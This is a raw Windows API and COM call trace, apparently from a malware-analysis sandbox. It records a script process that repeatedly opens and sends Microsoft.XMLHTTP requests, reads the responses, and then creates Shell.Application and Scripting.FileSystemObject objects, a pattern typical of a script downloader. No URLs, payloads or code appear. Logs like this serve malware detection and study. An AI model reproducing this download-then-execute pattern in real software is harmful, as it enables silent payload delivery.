	[0310.412] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0310.412] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0310.412] ??2@YAPEAX_K@Z () returned 0x62f310
	[0310.412] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0310.412] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.412] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0310.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0310.412] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0310.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.412] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.413] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.413] longjmp () 
	[0310.413] longjmp () 
	[0310.413] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0310.413] SysStringLen (param_1=0x0) returned 0x0
	[0310.413] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0310.413] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0310.413] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0310.413] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0310.413] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0310.413] ??2@YAPEAX_K@Z () returned 0x62f330
	[0310.413] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0310.413] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0310.413] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0310.413] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0310.414] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0310.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.414] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0310.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0310.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0310.414] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0310.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0312.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0312.380] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0312.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0312.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0312.380] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0312.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0312.380] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0312.380] SysStringLen (param_1=0x0) returned 0x0
	[0312.380] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0312.381] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0312.381] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0312.381] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0312.381] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0312.381] ??2@YAPEAX_K@Z () returned 0x62f350
	[0312.381] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0312.381] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0312.381] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0312.381] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0312.381] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0312.381] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0312.381] SysStringLen (param_1=0x0) returned 0x0
	[0312.381] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0312.384] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0312.384] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0312.385] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0312.385] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0312.385] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0312.385] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0313.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0313.098] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0313.098] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0313.100] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.100] SysStringLen (param_1=0x0) returned 0x0
	[0313.100] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.100] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0313.100] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0313.100] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.100] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0313.100] ??2@YAPEAX_K@Z () returned 0x62f330
	[0313.100] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0313.100] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.100] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0313.101] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0313.101] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0313.101] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.101] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.103] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.103] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.104] SysStringLen (param_1=0x0) returned 0x0
	[0313.104] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.104] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0313.104] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0313.104] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.104] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0313.104] ??2@YAPEAX_K@Z () returned 0x62f310
	[0313.104] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0313.104] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.104] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0313.104] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0313.104] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0313.105] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.105] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.105] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.105] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.105] SysStringLen (param_1=0x0) returned 0x0
	[0313.105] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.105] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
